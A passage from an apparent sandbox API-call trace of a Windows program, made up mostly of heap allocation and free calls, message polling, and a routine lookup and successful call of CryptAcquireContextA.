hHeap=0x770000, dwFlags=0x0, lpMem=0x889790 | out: hHeap=0x770000) returned 1 [0045.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afe18 | out: hHeap=0x770000) returned 1 [0045.598] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0045.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b2c00 [0045.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889790 [0045.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afe18 [0045.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889478 [0045.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dc0 [0045.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afe58 [0045.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dc0 | out: hHeap=0x770000) returned 1 [0045.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b2c28 [0045.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dc0 [0045.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afdf8 [0045.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afc98 [0045.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0xaa1ac0 [0045.598] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0045.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa1ac0 | out: hHeap=0x770000) returned 1 [0045.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afc98 | out: hHeap=0x770000) returned 1 [0045.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88b9f8 [0045.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab9f8 [0045.598] PeekMessageW (in: lpMsg=0x6aebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aebcc) returned 0 [0045.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afc98 [0045.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afde8 [0045.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afde8 | out: hHeap=0x770000) returned 1 [0045.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afc98 | out: hHeap=0x770000) returned 1 [0045.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab9f8 | out: hHeap=0x770000) returned 1 [0045.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88b9f8 | out: hHeap=0x770000) returned 1 [0045.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afdf8 | out: hHeap=0x770000) returned 1 [0045.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b9f8 [0045.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afdf8 [0045.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b9e0 [0045.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afdf8 | out: hHeap=0x770000) returned 1 [0045.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b9b0 [0045.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afdf8 [0045.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b9c8 [0045.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afdf8 | out: hHeap=0x770000) returned 1 [0045.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ba58 [0045.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afdf8 [0045.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ba88 [0045.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afdf8 | out: hHeap=0x770000) returned 1 [0045.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ba10 [0045.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afdf8 [0045.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afdf8 | out: hHeap=0x770000) returned 1 [0045.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ba28 [0045.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afdf8 [0045.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88baa0 [0045.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afdf8 | out: hHeap=0x770000) returned 1 [0045.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ba40 [0045.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afdf8 [0045.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afdf8 | out: hHeap=0x770000) returned 1 [0045.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88bae8 [0045.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afdf8 [0045.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ba70 [0045.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afdf8 | out: hHeap=0x770000) returned 1 [0045.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab9f8 [0045.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b2c28 | out: hHeap=0x770000) returned 1 [0045.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88bab8 [0045.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afdf8 [0045.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afdf8 | out: hHeap=0x770000) returned 1 [0045.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88bb00 [0045.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afdf8 [0045.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88bad0 [0045.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afdf8 | out: hHeap=0x770000) returned 1 [0045.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88bb30 [0045.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afdf8 [0045.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afdf8 | out: hHeap=0x770000) returned 1 [0045.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88bb18 [0045.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afdf8 [0045.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b8a8 [0045.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afdf8 | out: hHeap=0x770000) returned 1 [0045.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b890 [0045.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afdf8 [0045.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afdf8 | out: hHeap=0x770000) returned 1 [0045.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afdf8 [0045.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b8c0 [0045.600] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0045.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b8f0 [0045.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afc98 [0045.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afde8 [0045.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b908 [0045.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88b8f0 | out: hHeap=0x770000) returned 1 [0045.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afc98 | out: hHeap=0x770000) returned 1 [0045.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88b908 | out: hHeap=0x770000) returned 1 [0045.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afde8 | out: hHeap=0x770000) returned 1 [0045.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b2c28 [0045.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afde8 [0045.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b908 [0045.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afc98 [0045.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afd58 [0045.600] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b8f0 [0045.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88b908 | out: hHeap=0x770000) returned 1 [0045.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afc98 | out: hHeap=0x770000) returned 1 [0045.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88b8f0 | out: hHeap=0x770000) returned 1 [0045.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afd58 | out: hHeap=0x770000) returned 1 [0045.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afd58 [0045.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b8f0 [0045.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afc98 [0045.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afd68 [0045.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b908 [0045.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88b8f0 | out: hHeap=0x770000) returned 1 [0045.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afc98 | out: hHeap=0x770000) returned 1 [0045.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88b908 | out: hHeap=0x770000) returned 1 [0045.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afd68 | out: hHeap=0x770000) returned 1 [0045.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afd68 [0045.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b908 [0045.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afc98 [0045.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afcb8 [0045.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b8f0 [0045.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88b908 | out: hHeap=0x770000) returned 1 [0045.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afc98 | out: hHeap=0x770000) returned 1 [0045.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88b8f0 | out: hHeap=0x770000) returned 1 [0045.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afcb8 | out: hHeap=0x770000) returned 1 [0045.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afcb8 [0045.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b8f0 [0045.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afc98 [0045.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afda8 [0045.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b908 [0045.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88b8f0 | out: hHeap=0x770000) returned 1 [0045.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afc98 | out: hHeap=0x770000) returned 1 [0045.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88b908 | out: hHeap=0x770000) returned 1 [0045.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afda8 | out: hHeap=0x770000) returned 1 [0045.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afda8 [0045.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b908 [0045.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afc98 [0045.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afd38 [0045.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b8f0 [0045.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88b908 | out: hHeap=0x770000) returned 1 [0045.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afc98 | out: hHeap=0x770000) returned 1 [0045.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88b8f0 | out: hHeap=0x770000) returned 1 [0045.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afd38 | out: hHeap=0x770000) returned 1 [0045.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b8f0 [0045.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afd38 [0045.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0045.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0xaa9308 [0045.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0xaa9308, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0045.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88b8f0 | out: hHeap=0x770000) returned 1 [0045.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b2c50 [0045.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa9308 | out: hHeap=0x770000) returned 1 [0045.602] GetProcAddress (hModule=0x754b0000, lpProcName="CryptAcquireContext") returned 0x0 [0045.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b2c50 | out: hHeap=0x770000) returned 1 [0045.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afd38 | out: hHeap=0x770000) returned 1 [0045.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afd38 [0045.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0xaa1ac0 [0045.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b8f0 [0045.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afc98 [0045.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0045.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x15) returned 0xaa9308 [0045.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0xaa9308, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0045.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88b8f0 | out: hHeap=0x770000) returned 1 [0045.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b2c50 [0045.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa9308 | out: hHeap=0x770000) returned 1 [0045.603] GetProcAddress (hModule=0x754b0000, lpProcName="CryptAcquireContextA") returned 0x754b91dd [0045.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b2c50 | out: hHeap=0x770000) returned 1 [0045.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afc98 | out: hHeap=0x770000) returned 1 [0045.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa1ac0 | out: hHeap=0x770000) returned 1 [0045.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afd38 | out: hHeap=0x770000) returned 1 [0045.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b2c50 [0045.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afd38 [0045.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afc98 [0045.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afd88 [0045.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afcf8 [0045.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afcd8 [0045.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afd38 | out: hHeap=0x770000) returned 1 [0045.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afc98 | out: hHeap=0x770000) returned 1 [0045.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afd88 | out: hHeap=0x770000) returned 1 [0045.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afcf8 | out: hHeap=0x770000) returned 1 [0045.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afcd8 | out: hHeap=0x770000) returned 1 [0045.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b2c50 | out: hHeap=0x770000) returned 1 [0045.603] CryptAcquireContextA (in: phProv=0x6aeba0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6aeba0*=0x7d56f0) returned 1 [0045.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afcf8 [0045.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b7d08 [0045.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0xaa9328 [0045.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b8f0 [0045.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b908 [0045.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b920 [0045.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afd88 [0045.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88b920 | out: hHeap=0x770000) returned 1 [0045.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afd88 | out: hHeap=0x770000) returned 1 [0045.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88b908 | out: hHeap=0x770000) returned 1 [0045.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b908 [0045.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b920 [0045.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b938 [0045.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afd88 [0045.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88b938 | out: hHeap=0x770000) returned 1 [0045.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afd88 | out: hHeap=0x770000) returned 1 [0045.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88b920 | out: hHeap=0x770000) returned 1 [0045.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b920 [0045.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b938 [0045.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b950 [0045.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afd88 [0045.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88b950 | out: hHeap=0x770000) returned 1 [0045.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afd88 | out: hHeap=0x770000) returned 1 [0045.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88b938 | out: hHeap=0x770000) returned 1 [0045.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b938 [0045.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b950 [0045.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b968 [0045.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afd88 [0045.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88b968 | out: hHeap=0x770000) returned 1 [0045.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afd88 | out: hHeap=0x770000) returned 1 [0045.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88b950 | out: hHeap=0x770000) returned 1 [0045.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b950 [0045.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b968 [0045.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b980 [0045.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afd88 [0045.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88b980 | out: hHeap=0x770000) returned 1 [0045.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afd88 | out: hHeap=0x770000) returned 1 [0045.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88b968 | out: hHeap=0x770000) returned 1 [0045.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b968 [0045.605] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0045.605] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0045.605] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0045.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa1ac0 | out: hHeap=0x770000) returned 1 [0045.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afe58 | out: hHeap=0x770000) returned 1 [0045.606] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0045.606] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0045.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab9f8 | out: hHeap=0x770000) returned 1 [0045.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88b8a8 | out: hHeap=0x770000) returned 1 [0045.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b2ca0 | out: hHeap=0x770000) returned 1 [0045.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afdf8 | out: hHeap=0x770000) returned 1 [0045.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b2c78 | out: hHeap=0x770000) returned 1 [0045.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88bb18 | out: hHeap=0x770000) returned 1 [0045.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afe58 | out: hHeap=0x770000) returned 1 [0045.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b2c28 | out: hHeap=0x770000) returned 1 [0045.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88b890 | out: hHeap=0x770000) returned 1 [0045.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b2c50 | out: hHeap=0x770000) returned 1 [0045.606] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0045.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0045.606] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0045.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0045.606] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0045.606] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0045.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa1ac0 | out: hHeap=0x770000) returned 1 [0045.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7afe58 | out: hHeap=0x770000) returned 1 [0045.606] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0045.606] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0045.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab9f8 | out: hHeap=0x770000) returned 1 [0045.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88b890 | out: hHeap=0x770000) returned 1 [0045.606] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0045.606] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, 